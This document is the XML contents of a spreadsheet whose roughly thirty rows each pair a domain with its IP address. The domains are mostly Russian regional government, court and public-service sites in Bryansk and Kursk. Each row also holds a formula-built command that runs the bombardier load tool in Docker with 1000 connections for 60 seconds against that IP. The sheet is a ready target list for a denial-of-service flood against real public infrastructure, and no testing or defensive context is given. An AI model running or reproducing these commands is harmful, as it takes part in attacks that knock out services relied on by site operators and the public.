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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="83">
  <si>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sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.42.45.126 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>84.42.45.126</t>
  </si>
  <si>
    <t>www.rabota-bryanskobl.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.42.56.189 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>84.42.56.189</t>
  </si>
  <si>
    <t>brkmed.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.183.45.148 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.183.45.148</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.249.48.44 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>89.249.48.44</t>
  </si>
  <si>
    <t>econom32.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.23.50.50 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>5.23.50.50</t>
  </si>
  <si>
    <t>depbez.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.223.123.233 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>89.223.123.233</t>
  </si>
  <si>
    <t>bga32.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.107.66.166 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.107.66.166</t>
  </si>
  <si>
    <t>git32.rostrud.gov.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.42.56.82 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>84.42.56.82</t>
  </si>
  <si>
    <t>www.uszn032.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 87.236.16.248 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>87.236.16.248</t>
  </si>
  <si>
    <t>archive-bryansk.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.199.149.231 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.199.149.231</t>
  </si>
  <si>
    <t>gzhi32.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.215.189.14 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.215.189.14</t>
  </si>
  <si>
    <t>tender32.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.161.52.80 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.161.52.80</t>
  </si>
  <si>
    <t>pfr.gov.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.164.138.171 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.164.138.171</t>
  </si>
  <si>
    <t>kursk.arbitr.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.164.138.173 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.164.138.173</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.164.138.175 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.164.138.175</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.173.157.58 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>95.173.157.58</t>
  </si>
  <si>
    <t>kursk.roskazna.gov.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.198.239 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>31.31.198.239</t>
  </si>
  <si>
    <t>kurskzags.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.183.175.240 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.183.175.240</t>
  </si>
  <si>
    <t>archive.rkursk.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.176.228.4 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>81.176.228.4</t>
  </si>
  <si>
    <t>ksp-kursk.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.165.130 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.93.165.130</t>
  </si>
  <si>
    <t>tarifkursk.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.123.195.14 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.123.195.14</t>
  </si>
  <si>
    <t>gzhi-kursk.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.196.200 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>31.31.196.200</t>
  </si>
  <si>
    <t>ksokursk.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.177.24.64 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>81.177.24.64</t>
  </si>
  <si>
    <t>komobr46.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.243.9.162 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>77.243.9.162</t>
  </si>
  <si>
    <t>imkursk.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.192.1.54 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>176.192.1.54</t>
  </si>
  <si>
    <t>kurskduma.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 87.236.16.254 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>87.236.16.254</t>
  </si>
  <si>
    <t>горсобрание-курск.рф</t>
  </si>
  <si>
    <t>git46.rostrud.gov.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.193.84.148 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>85.193.84.148</t>
  </si>
  <si>
    <t>kursk.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.202.228.148 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>82.202.228.148</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.184.208.125 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>31.184.208.125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</si>
</sst>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8" customHeight="1" outlineLevelRow="0" outlineLevelCol="0"/>
  <cols>
    <col min="1" max="1" width="92.5" style="1" customWidth="1"/>
    <col min="2" max="2" width="18.6719" style="1" customWidth="1"/>
    <col min="3" max="3" width="29.6719" style="1" customWidth="1"/>
    <col min="4" max="5" width="8.85156" style="1" customWidth="1"/>
    <col min="6" max="16384" width="8.85156" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="14.6" customHeight="1">
      <c r="A1" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B1&amp;" &amp;&amp; sleep 5;"</f>
        <v>0</v>
      </c>
      <c r="B1" t="s" s="2">
        <v>1</v>
      </c>
      <c r="C1" t="s" s="2">
        <v>2</v>
      </c>
      <c r="D1" s="3"/>
      <c r="E1" s="3"/>
    </row>
    <row r="2" ht="14.6" customHeight="1">
      <c r="A2" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B2&amp;" &amp;&amp; sleep 5;"</f>
        <v>3</v>
      </c>
      <c r="B2" t="s" s="2">
        <v>4</v>
      </c>
      <c r="C2" t="s" s="2">
        <v>5</v>
      </c>
      <c r="D2" s="3"/>
      <c r="E2" s="3"/>
    </row>
    <row r="3" ht="14.6" customHeight="1">
      <c r="A3" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B3&amp;" &amp;&amp; sleep 5;"</f>
        <v>6</v>
      </c>
      <c r="B3" t="s" s="2">
        <v>7</v>
      </c>
      <c r="C3" t="s" s="2">
        <v>5</v>
      </c>
      <c r="D3" s="3"/>
      <c r="E3" s="3"/>
    </row>
    <row r="4" ht="14.6" customHeight="1">
      <c r="A4" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B4&amp;" &amp;&amp; sleep 5;"</f>
        <v>8</v>
      </c>
      <c r="B4" t="s" s="2">
        <v>9</v>
      </c>
      <c r="C4" t="s" s="2">
        <v>10</v>
      </c>
      <c r="D4" s="3"/>
      <c r="E4" s="3"/>
    </row>
    <row r="5" ht="14.6" customHeight="1">
      <c r="A5" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B5&amp;" &amp;&amp; sleep 5;"</f>
        <v>11</v>
      </c>
      <c r="B5" t="s" s="2">
        <v>12</v>
      </c>
      <c r="C5" t="s" s="2">
        <v>13</v>
      </c>
      <c r="D5" s="3"/>
      <c r="E5" s="3"/>
    </row>
    <row r="6" ht="14.6" customHeight="1">
      <c r="A6" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B6&amp;" &amp;&amp; sleep 5;"</f>
        <v>14</v>
      </c>
      <c r="B6" t="s" s="2">
        <v>15</v>
      </c>
      <c r="C6" t="s" s="2">
        <v>16</v>
      </c>
      <c r="D6" s="3"/>
      <c r="E6" s="3"/>
    </row>
    <row r="7" ht="14.6" customHeight="1">
      <c r="A7" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B7&amp;" &amp;&amp; sleep 5;"</f>
        <v>17</v>
      </c>
      <c r="B7" t="s" s="2">
        <v>18</v>
      </c>
      <c r="C7" t="s" s="2">
        <v>19</v>
      </c>
      <c r="D7" s="3"/>
      <c r="E7" s="3"/>
    </row>
    <row r="8" ht="14.6" customHeight="1">
      <c r="A8" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B8&amp;" &amp;&amp; sleep 5;"</f>
        <v>20</v>
      </c>
      <c r="B8" t="s" s="2">
        <v>21</v>
      </c>
      <c r="C8" t="s" s="2">
        <v>22</v>
      </c>
      <c r="D8" s="3"/>
      <c r="E8" s="3"/>
    </row>
    <row r="9" ht="14.6" customHeight="1">
      <c r="A9" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B9&amp;" &amp;&amp; sleep 5;"</f>
        <v>23</v>
      </c>
      <c r="B9" t="s" s="2">
        <v>24</v>
      </c>
      <c r="C9" t="s" s="2">
        <v>25</v>
      </c>
      <c r="D9" s="3"/>
      <c r="E9" s="3"/>
    </row>
    <row r="10" ht="14.6" customHeight="1">
      <c r="A10" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B10&amp;" &amp;&amp; sleep 5;"</f>
        <v>26</v>
      </c>
      <c r="B10" t="s" s="2">
        <v>27</v>
      </c>
      <c r="C10" t="s" s="2">
        <v>28</v>
      </c>
      <c r="D10" s="3"/>
      <c r="E10" s="3"/>
    </row>
    <row r="11" ht="14.6" customHeight="1">
      <c r="A11" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B11&amp;" &amp;&amp; sleep 5;"</f>
        <v>29</v>
      </c>
      <c r="B11" t="s" s="2">
        <v>30</v>
      </c>
      <c r="C11" t="s" s="2">
        <v>31</v>
      </c>
      <c r="D11" s="3"/>
      <c r="E11" s="3"/>
    </row>
    <row r="12" ht="14.6" customHeight="1">
      <c r="A12" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B12&amp;" &amp;&amp; sleep 5;"</f>
        <v>32</v>
      </c>
      <c r="B12" t="s" s="2">
        <v>33</v>
      </c>
      <c r="C12" t="s" s="2">
        <v>34</v>
      </c>
      <c r="D12" s="3"/>
      <c r="E12" s="3"/>
    </row>
    <row r="13" ht="14.6" customHeight="1">
      <c r="A13" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B13&amp;" &amp;&amp; sleep 5;"</f>
        <v>35</v>
      </c>
      <c r="B13" t="s" s="2">
        <v>36</v>
      </c>
      <c r="C13" t="s" s="2">
        <v>37</v>
      </c>
      <c r="D13" s="3"/>
      <c r="E13" s="3"/>
    </row>
    <row r="14" ht="14.6" customHeight="1">
      <c r="A14" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B14&amp;" &amp;&amp; sleep 5;"</f>
        <v>38</v>
      </c>
      <c r="B14" t="s" s="2">
        <v>39</v>
      </c>
      <c r="C14" t="s" s="2">
        <v>37</v>
      </c>
      <c r="D14" s="3"/>
      <c r="E14" s="3"/>
    </row>
    <row r="15" ht="14.6" customHeight="1">
      <c r="A15" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B15&amp;" &amp;&amp; sleep 5;"</f>
        <v>40</v>
      </c>
      <c r="B15" t="s" s="2">
        <v>41</v>
      </c>
      <c r="C15" t="s" s="2">
        <v>37</v>
      </c>
      <c r="D15" s="3"/>
      <c r="E15" s="3"/>
    </row>
    <row r="16" ht="14.6" customHeight="1">
      <c r="A16" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B16&amp;" &amp;&amp; sleep 5;"</f>
        <v>42</v>
      </c>
      <c r="B16" t="s" s="2">
        <v>43</v>
      </c>
      <c r="C16" t="s" s="2">
        <v>44</v>
      </c>
      <c r="D16" s="3"/>
      <c r="E16" s="3"/>
    </row>
    <row r="17" ht="14.6" customHeight="1">
      <c r="A17" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B17&amp;" &amp;&amp; sleep 5;"</f>
        <v>45</v>
      </c>
      <c r="B17" t="s" s="2">
        <v>46</v>
      </c>
      <c r="C17" t="s" s="2">
        <v>47</v>
      </c>
      <c r="D17" s="3"/>
      <c r="E17" s="3"/>
    </row>
    <row r="18" ht="14.6" customHeight="1">
      <c r="A18" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B18&amp;" &amp;&amp; sleep 5;"</f>
        <v>48</v>
      </c>
      <c r="B18" t="s" s="2">
        <v>49</v>
      </c>
      <c r="C18" t="s" s="2">
        <v>50</v>
      </c>
      <c r="D18" s="3"/>
      <c r="E18" s="3"/>
    </row>
    <row r="19" ht="14.6" customHeight="1">
      <c r="A19" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B19&amp;" &amp;&amp; sleep 5;"</f>
        <v>51</v>
      </c>
      <c r="B19" t="s" s="2">
        <v>52</v>
      </c>
      <c r="C19" t="s" s="2">
        <v>53</v>
      </c>
      <c r="D19" s="3"/>
      <c r="E19" s="3"/>
    </row>
    <row r="20" ht="14.6" customHeight="1">
      <c r="A20" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B20&amp;" &amp;&amp; sleep 5;"</f>
        <v>54</v>
      </c>
      <c r="B20" t="s" s="2">
        <v>55</v>
      </c>
      <c r="C20" t="s" s="2">
        <v>56</v>
      </c>
      <c r="D20" s="3"/>
      <c r="E20" s="3"/>
    </row>
    <row r="21" ht="14.6" customHeight="1">
      <c r="A21" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B21&amp;" &amp;&amp; sleep 5;"</f>
        <v>57</v>
      </c>
      <c r="B21" t="s" s="2">
        <v>58</v>
      </c>
      <c r="C21" t="s" s="2">
        <v>59</v>
      </c>
      <c r="D21" s="3"/>
      <c r="E21" s="3"/>
    </row>
    <row r="22" ht="14.6" customHeight="1">
      <c r="A22" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B22&amp;" &amp;&amp; sleep 5;"</f>
        <v>60</v>
      </c>
      <c r="B22" t="s" s="2">
        <v>61</v>
      </c>
      <c r="C22" t="s" s="2">
        <v>62</v>
      </c>
      <c r="D22" s="3"/>
      <c r="E22" s="3"/>
    </row>
    <row r="23" ht="14.6" customHeight="1">
      <c r="A23" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B23&amp;" &amp;&amp; sleep 5;"</f>
        <v>63</v>
      </c>
      <c r="B23" t="s" s="2">
        <v>64</v>
      </c>
      <c r="C23" t="s" s="2">
        <v>65</v>
      </c>
      <c r="D23" s="3"/>
      <c r="E23" s="3"/>
    </row>
    <row r="24" ht="14.6" customHeight="1">
      <c r="A24" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B24&amp;" &amp;&amp; sleep 5;"</f>
        <v>66</v>
      </c>
      <c r="B24" t="s" s="2">
        <v>67</v>
      </c>
      <c r="C24" t="s" s="2">
        <v>68</v>
      </c>
      <c r="D24" s="3"/>
      <c r="E24" s="3"/>
    </row>
    <row r="25" ht="14.6" customHeight="1">
      <c r="A25" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B25&amp;" &amp;&amp; sleep 5;"</f>
        <v>69</v>
      </c>
      <c r="B25" t="s" s="2">
        <v>70</v>
      </c>
      <c r="C25" t="s" s="2">
        <v>71</v>
      </c>
      <c r="D25" s="3"/>
      <c r="E25" s="3"/>
    </row>
    <row r="26" ht="14.6" customHeight="1">
      <c r="A26" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B26&amp;" &amp;&amp; sleep 5;"</f>
        <v>72</v>
      </c>
      <c r="B26" t="s" s="2">
        <v>73</v>
      </c>
      <c r="C26" t="s" s="2">
        <v>74</v>
      </c>
      <c r="D26" s="3"/>
      <c r="E26" s="3"/>
    </row>
    <row r="27" ht="14.6" customHeight="1">
      <c r="A27" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B27&amp;" &amp;&amp; sleep 5;"</f>
        <v>17</v>
      </c>
      <c r="B27" t="s" s="2">
        <v>18</v>
      </c>
      <c r="C27" t="s" s="2">
        <v>75</v>
      </c>
      <c r="D27" s="3"/>
      <c r="E27" s="3"/>
    </row>
    <row r="28" ht="14.6" customHeight="1">
      <c r="A28" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B28&amp;" &amp;&amp; sleep 5;"</f>
        <v>76</v>
      </c>
      <c r="B28" t="s" s="2">
        <v>77</v>
      </c>
      <c r="C28" t="s" s="2">
        <v>78</v>
      </c>
      <c r="D28" s="3"/>
      <c r="E28" s="3"/>
    </row>
    <row r="29" ht="14.6" customHeight="1">
      <c r="A29" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B29&amp;" &amp;&amp; sleep 5;"</f>
        <v>79</v>
      </c>
      <c r="B29" t="s" s="2">
        <v>80</v>
      </c>
      <c r="C29" t="s" s="2">
        <v>78</v>
      </c>
      <c r="D29" s="3"/>
      <c r="E29" s="3"/>
    </row>
    <row r="30" ht="14.6" customHeight="1">
      <c r="A30" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B30&amp;" &amp;&amp; sleep 5;"</f>
        <v>81</v>
      </c>
      <c r="B30" t="s" s="2">
        <v>82</v>
      </c>
      <c r="C30" t="s" s="2">
        <v>78</v>
      </c>
      <c r="D30" s="3"/>
      <c r="E30" s="3"/>
    </row>
    <row r="31" ht="14.6" customHeight="1">
      <c r="A31" s="3"/>
      <c r="B31" s="3"/>
      <c r="C31" s="3"/>
      <c r="D31" s="3"/>
      <c r="E3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